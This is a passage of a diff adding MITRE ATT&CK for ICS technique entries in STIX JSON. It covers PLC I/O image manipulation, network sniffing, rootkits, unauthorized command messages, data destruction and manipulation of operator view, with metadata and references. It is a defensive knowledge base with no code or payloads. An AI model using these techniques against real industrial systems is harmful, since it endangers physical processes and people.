Methods of I/O image manipulation may include overriding the I/O table via direct memory manipulation or using the override function used for testing PLC programs. (Citation: Dr. Kelvin T. Erickson December 2010) During the scan cycle, a PLC reads the status of all inputs and stores them in an image table. (Citation: Nanjundaiah, Vaidyanath) The image table is the PLCs internal storage location where values of inputs/outputs for one scan are stored while it executes the user program. After the PLC has solved the entire logic program, it updates the output image table. The contents of this output image table are written to the corresponding output points in I/O Modules. \n\nOne of the unique characteristics of PLCs is their ability to override the status of a physical discrete input or to override the logic driving a physical output coil and force the output to a desired status.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_detection": "", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Asset: Software" + ], + "type": "attack-pattern", + "id": "attack-pattern--36e9f5bc-ac13-4da4-a2f4-01f4877d9004", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0835", + "external_id": "T0835" + }, + { + "source_name": "Dr. Kelvin T. Erickson December 2010", + "description": "Dr. Kelvin T. Erickson 2010, December Programmable logic controller hardware Retrieved. 
2018/03/29 ", + "url": "https://www.isa.org/standards-and-publications/isa-publications/intech/2010/december/programmable-logic-controller-hardware/" + }, + { + "source_name": "Nanjundaiah, Vaidyanath", + "description": "Nanjundaiah, Vaidyanath Dr. Kelvin T. Erickson 2010, December Programmable logic controller hardware Retrieved. 2018/03/29 PLC Ladder Logic Basics Retrieved. 2021/10/11 ", + "url": "https://www.ezautomation.net/industry-articles/plc-ladder-logic-basics.htm" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Network Sniffing", + "description": "Network sniffing is the practice of using a network interface on a computer system to monitor or capture information (Citation: Enterprise ATT&CK January 2018) regardless of whether it is the specified destination for the information. \n\nAn adversary may attempt to sniff the traffic to gain information about the target. This information can vary in the level of importance. Relatively unimportant information is general communications to and from machines. Relatively important information would be login information. User credentials may be sent over an unencrypted protocol, such as Telnet, that can be captured and obtained through network packet analysis. 
\n\nIn addition, ARP and Domain Name Service (DNS) poisoning can be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Command: Command Execution", + "Process: Process Creation" + ], + "type": "attack-pattern", + "id": "attack-pattern--38213338-1aab-479d-949b-c81b66ccca5c", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0842", + "external_id": "T0842" + }, + { + "source_name": "Enterprise ATT&CK January 2018", + "description": "Enterprise ATT&CK 2018, January 11 Network Sniffing Retrieved. 2018/05/17 ", + "url": "https://attack.mitre.org/wiki/Technique/T1040" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Rootkit", + "description": "Adversaries may deploy rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting and modifying operating-system API calls that supply system information. Rootkits or rootkit-enabling functionality may reside at the user or kernel level in the operating system, or lower. 
(Citation: Enterprise ATT&CK January 2018) \n\nFirmware rootkits that affect the operating system yield nearly full control of the system. While firmware rootkits are normally developed for the main processing board, they can also be developed for the I/O that is attached to an asset. Compromise of this firmware allows the modification of all of the process variables and functions the module engages in. This may result in commands being disregarded and false information being fed to the main device. By tampering with device processes, an adversary may inhibit its expected response functions and possibly enable [Impact](https://attack.mitre.org/tactics/TA0105).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "evasion" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Firmware: Firmware Modification" + ], + "type": "attack-pattern", + "id": "attack-pattern--3b6b9246-43f8-4c69-ad7a-2b11cfe0a0d9", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0851", + "external_id": "T0851" + }, + { + "source_name": "Enterprise ATT&CK January 2018", + "description": "Enterprise ATT&CK 2018, January 11 Rootkit Retrieved. 
2018/05/16 ", + "url": "https://attack.mitre.org/wiki/Technique/T1014" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Automated Collection", + "description": "Adversaries may automate collection of industrial environment information using tools or scripts. This automated collection may leverage native control protocols and tools available in the control systems environment. For example, the OPC protocol may be used to enumerate and gather information. Access to a system or interface with these native protocols may allow collection and enumeration of other attached, communicating servers and devices.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED", + "Safety Instrumented System/Protection Relay", + "Control Server" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Command: Command Execution", + "Script: Script Execution", + "Network Traffic: Network Traffic Content", + "File: File Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--3de230d4-3e42-4041-b089-17e1128feded", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0802", + "external_id": "T0802" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + }, + { + "modified": "2022-09-19T13:57:23.538Z", + "name": "Block Reporting Message", + "description": "Adversaries may block or prevent a reporting message from reaching its intended target. 
In control systems, reporting messages contain telemetry data (e.g., I/O values) pertaining to the current state of equipment and the industrial process. By blocking these reporting messages, an adversary can potentially hide their actions from an operator.\n\nBlocking reporting messages in control systems that manage physical processes may contribute to system impact, causing inhibition of a response function. A control system may not be able to respond in a proper or timely manner to an event, such as a dangerous fault, if its corresponding reporting message is blocked. (Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011) (Citation: Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_detection": "", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED", + "Input/Output Server", + "Device Configuration/Parameters" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Network Traffic: Network Traffic Flow", + "Process: Process Termination", + "Operational Databases: Process/Event Alarm", + "Operational Databases: Process History/Live Data" + ], + "type": "attack-pattern", + "id": "attack-pattern--3f1f4ccb-9be2-4ff8-8f69-dd972221169b", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0804", + "external_id": "T0804" + }, + { + "source_name": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011", + "description": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011 A Taxonomy of Cyber Attacks on SCADA Systems Retrieved. 
2018/01/12 ", + "url": "http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258" + }, + { + "source_name": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016", + "description": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems 2016, March 18 Analysis of the Cyber Attack on the Ukranian Power Grid: Defense Use Case Retrieved. 2018/03/27 ", + "url": "https://assets.contentstack.io/v3/assets/blt36c2e63521272fdc/blt6a77276749b76a40/607f235992f0063e5c070fff/E-ISAC_SANS_Ukraine_DUC_5%5b73%5d.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-04-05T14:16:02.811Z", + "name": "Unauthorized Command Message", + "description": "Adversaries may send unauthorized command messages to instruct control system assets to perform actions outside of their intended functionality, or without the logical preconditions to trigger their expected function. Command messages are used in ICS networks to give direct instructions to control systems devices. If an adversary can send an unauthorized command message to a control system, then it can instruct the control systems device to perform an action outside the normal bounds of the device's actions. An adversary could potentially instruct a control systems device to perform an action that will cause an [Impact](https://attack.mitre.org/tactics/TA0105). (Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011)\n\nIn the Dallas Siren incident, adversaries were able to send command messages to activate tornado alarm systems across the city without an impending tornado or other disaster. 
(Citation: Zack Whittaker April 2017) (Citation: Benjamin Freed March 2019)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impair-process-control" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Flow", + "Application Log: Application Log Content", + "Operational Databases: Process/Event Alarm", + "Network Traffic: Network Traffic Content", + "Operational Databases: Process History/Live Data" + ], + "type": "attack-pattern", + "id": "attack-pattern--40b300ba-f553-48bf-862e-9471b220d455", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0855", + "external_id": "T0855" + }, + { + "source_name": "Benjamin Freed March 2019", + "description": "Benjamin Freed 2019, March 13 Tornado sirens in Dallas suburbs deactivated after being hacked and set off Retrieved. 2020/11/06 ", + "url": "https://statescoop.com/tornado-sirens-in-dallas-suburbs-deactivated-after-being-hacked-and-set-off/" + }, + { + "source_name": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011", + "description": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011 A Taxonomy of Cyber Attacks on SCADA Systems Retrieved. 2018/01/12 ", + "url": "http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258" + }, + { + "source_name": "Zack Whittaker April 2017", + "description": "Zack Whittaker 2017, April 12 Dallas' emergency sirens were hacked with a rogue radio signal Retrieved. 
2020/11/06 ", + "url": "https://www.zdnet.com/article/experts-think-they-know-how-dallas-emergency-sirens-were-hacked/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-09-19T14:12:22.878Z", + "name": "Data Destruction", + "description": "Adversaries may perform data destruction over the course of an operation. The adversary may drop or create malware, tools, or other non-native files on a target system to accomplish this, potentially leaving behind traces of malicious activities. Such non-native files and other data may be removed over the course of an intrusion to maintain a small footprint or as a standard part of the post-intrusion cleanup process. (Citation: Enterprise ATT&CK January 2018)\n\nData destruction may also be used to render operator interfaces unable to respond and to disrupt response functions from occurring as expected. An adversary may also destroy data backups that are vital to recovery after an incident.\n\nStandard file deletion commands are available on most operating system and device interfaces to perform cleanup, but adversaries may use other tools as well. 
Two examples are Windows Sysinternals SDelete and Active@ Killdisk.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_detection": "", + "x_mitre_platforms": [ + "Control Server", + "Human-Machine Interface", + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_contributors": [ + "Matan Dobrushin - Otorio" + ], + "x_mitre_data_sources": [ + "File: File Deletion", + "File: File Modification", + "Command: Command Execution", + "Process: Process Creation" + ], + "type": "attack-pattern", + "id": "attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0809", + "external_id": "T0809" + }, + { + "source_name": "Enterprise ATT&CK January 2018", + "description": "Enterprise ATT&CK 2018, January 11 File Deletion Retrieved. 2018/05/17 ", + "url": "https://attack.mitre.org/wiki/Technique/T1107" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Manipulation of View", + "description": "Adversaries may attempt to manipulate the information reported back to operators or controllers. This manipulation may be short term or sustained. During this time the process itself could be in a much different state than what is reported. (Citation: Corero) (Citation: Michael J. Assante and Robert M. 
Lee) (Citation: Tyson Macaulay) \n\nOperators may be fooled into doing something that is harmful to the system in a loss of view situation. With a manipulated view into the systems, operators may issue inappropriate control sequences that introduce faults or catastrophic failures into the system. Business analysis systems can also be provided with inaccurate data leading to bad management decisions.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Engineering Workstation", + "Human-Machine Interface", + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--4c2e1408-9d68-4187-8e6b-a77bc52700ec", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0832", + "external_id": "T0832" + }, + { + "source_name": "Corero", + "description": "Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 ", + "url": "https://www.corero.com/resources/files/whitepapers/cns_whitepaper_ics.pdf" + }, + { + "source_name": "Michael J. Assante and Robert M. Lee", + "description": "Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 ", + "url": "https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297" + }, + { + "source_name": "Tyson Macaulay", + "description": "Tyson Macaulay Michael J. Assante and Robert M. 
Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 RIoT Control: Understanding and Managing Risks and the Internet of Things Retrieved. 2019/11/04 ", + "url": "https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-08T20:13:24.241Z", + "name": "Data Historian Compromise", + "description": "Adversaries may compromise and gain control of a data historian to gain a foothold into the control system environment. Access to a data historian may be used to learn stored database archival and analysis information on the control system. A dual-homed data historian may provide adversaries an interface from the IT environment to the OT environment. \n\nDragos has released an updated analysis on CrashOverride that outlines the attack from the ICS network breach to payload delivery and execution. (Citation: Industroyer - Dragos - 201810) The report summarized that CrashOverride represents a new application of malware, but relied on standard intrusion techniques. In particular, new artifacts include references to a Microsoft Windows Server 2003 host, with a SQL Server. Within the ICS environment, such a database server can act as a data historian. Dragos noted a device with this role should be \"expected to have extensive connections\" within the ICS environment. 
Adversary activity leveraged database capabilities to perform reconnaissance, including directory queries and network connectivity checks.\n\nPermissions Required: Administrator\n\nContributors: Joe Slowik - Dragos", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Joe Slowik - Dragos" + ], + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_permissions_required": [ + "Administrator" + ], + "type": "attack-pattern", + "id": "attack-pattern--50d3222f-7550-4a3c-94e1-78cb6c81d064", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-ics-attack", + "url": "https://attack.mitre.org/techniques/T0810", + "external_id": "T0810" + }, + { + "source_name": "Industroyer - Dragos - 201810", + "description": "Dragos. (2018, October 12). Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE. Retrieved October 14, 2019.", + "url": "https://dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + }, + { + "modified": "2023-05-08T20:13:24.241Z", + "name": "Network Service Scanning", + "description": "Network Service Scanning is the process of discovering services on networked systems. This can be achieved through a technique called port scanning or probing. Port scanning interacts with the TCP/IP ports on a target system to determine whether ports are open, closed, or filtered by a firewall. 
This does not reveal the service that is running behind the port, but since many common services are run on [https://www.iana.org/assignments/service-names-port-numbers/service-names-port-numbers.xhtml specific port numbers], the type of service can be assumed. More in-depth testing includes interaction with the actual service to determine the service type and specific version. One of the most-popular tools to use for Network Service Scanning is [https://nmap.org/ Nmap].\n\nAn adversary may attempt to gain information about a target device and its role on the network via Network Service Scanning techniques, such as port scanning. Network Service Scanning is useful for determining potential vulnerabilities in services on target devices. Network Service Scanning is closely tied to .\n\nScanning ports can be noisy on a network. In some attacks, adversaries probe for specific ports using custom tools. This was specifically seen in the Triton and PLC-Blaster attacks.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--539d0484-fe95-485a-b654-86991c0d0d00", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-ics-attack", + "url": "https://attack.mitre.org/techniques/T0841", + "external_id": "T0841" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Indicator Removal on Host", + "description": "Adversaries may 
attempt to remove indicators of their presence on a system in an effort to cover their tracks. In cases where an adversary may feel detection is imminent, they may try to overwrite, delete, or cover up changes they have made to the device.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Human-Machine Interface", + "Safety Instrumented System/Protection Relay" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Process: OS API Execution", + "File: File Metadata", + "Windows Registry: Windows Registry Key Deletion", + "File: File Modification", + "Command: Command Execution", + "Windows Registry: Windows Registry Key Modification", + "Process: Process Creation", + "File: File Deletion" + ], + "type": "attack-pattern", + "id": "attack-pattern--53a26eee-1080-4d17-9762-2027d5a1b805", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0872", + "external_id": "T0872" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "I/O Image", + "description": "Adversaries may seek to capture process values related to the inputs and outputs of a PLC. During the scan cycle, a PLC reads the status of all inputs and stores them in an image table. (Citation: Nanjundaiah, Vaidyanath) The image table is the PLCs internal storage location where values of inputs/outputs for one scan are stored while it executes the user program. After the PLC has solved the entire logic program, it updates the output image table. 
The contents of this output image table are written to the corresponding output points in I/O Modules.\n\nThe Input and Output Image tables described above make up the I/O Image on a PLC. This image is used by the user program instead of directly interacting with physical I/O. (Citation: Spenneberg, Ralf 2016) \n\nAdversaries may collect the I/O Image state of a PLC by utilizing a devices [Native API](https://attack.mitre.org/techniques/T0834) to access the memory regions directly. The collection of the PLCs I/O state could be used to replace values or inform future stages of an attack.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Asset: Software" + ], + "type": "attack-pattern", + "id": "attack-pattern--53a48c74-0025-45f4-b04a-baa853df8204", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0877", + "external_id": "T0877" + }, + { + "source_name": "Nanjundaiah, Vaidyanath", + "description": "Nanjundaiah, Vaidyanath PLC Ladder Logic Basics Retrieved. 2021/10/11 ", + "url": "https://www.ezautomation.net/industry-articles/plc-ladder-logic-basics.htm" + }, + { + "source_name": "Spenneberg, Ralf 2016", + "description": "Spenneberg, Ralf 2016 PLC-Blaster Retrieved. 
2019/06/06 ", + "url": "https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:16:25.031Z", + "name": "Denial of View", + "description": "Adversaries may cause a denial of view in attempt to disrupt and prevent operator oversight on the status of an ICS environment. This may manifest itself as a temporary communication failure between a device and its control source, where the interface recovers and becomes available once the interference ceases. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay) \n\nAn adversary may attempt to deny operator visibility by preventing them from receiving status and reporting messages. Denying this view may temporarily block and prevent operators from noticing a change in state or anomalous behavior. The environment's data and processes may still be operational, but functioning in an unintended or adversarial manner. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impact" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.1", + "type": "attack-pattern", + "id": "attack-pattern--56ddc820-6cfb-407f-850b-52c035d123ac", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0815", + "external_id": "T0815" + }, + { + "source_name": "Corero", + "description": "Corero Industrial Control System (ICS) Security Retrieved. 
2019/11/04 ", + "url": "https://www.corero.com/resources/files/whitepapers/cns_whitepaper_ics.pdf" + }, + { + "source_name": "Michael J. Assante and Robert M. Lee", + "description": "Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 ", + "url": "https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297" + }, + { + "source_name": "Tyson Macaulay", + "description": "Tyson Macaulay Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 RIoT Control: Understanding and Managing Risks and the Internet of Things Retrieved. 2019/11/04 ", + "url": "https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Execution through API", + "description": "Adversaries may attempt to leverage Application Program Interfaces (APIs) used for communication between control software and the hardware. 
Specific functionality is often coded into APIs which can be called by software to engage specific functions on a device or other software.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Process: OS API Execution" + ], + "type": "attack-pattern", + "id": "attack-pattern--5a2610f6-9fff-41e1-bc27-575ca20383d4", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0871", + "external_id": "T0871" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Supply Chain Compromise", + "description": "Adversaries may perform supply chain compromise to gain control systems environment access by means of infected products, software, and workflows. Supply chain compromise is the manipulation of products, such as devices or software, or their delivery mechanisms before receipt by the end consumer. Adversary compromise of these products and mechanisms is done for the goal of data or system compromise, once infected products are introduced to the target environment. \n\nSupply chain compromise can occur at all stages of the supply chain, from manipulation of development tools and environments to manipulation of developed products and tools distribution mechanisms. 
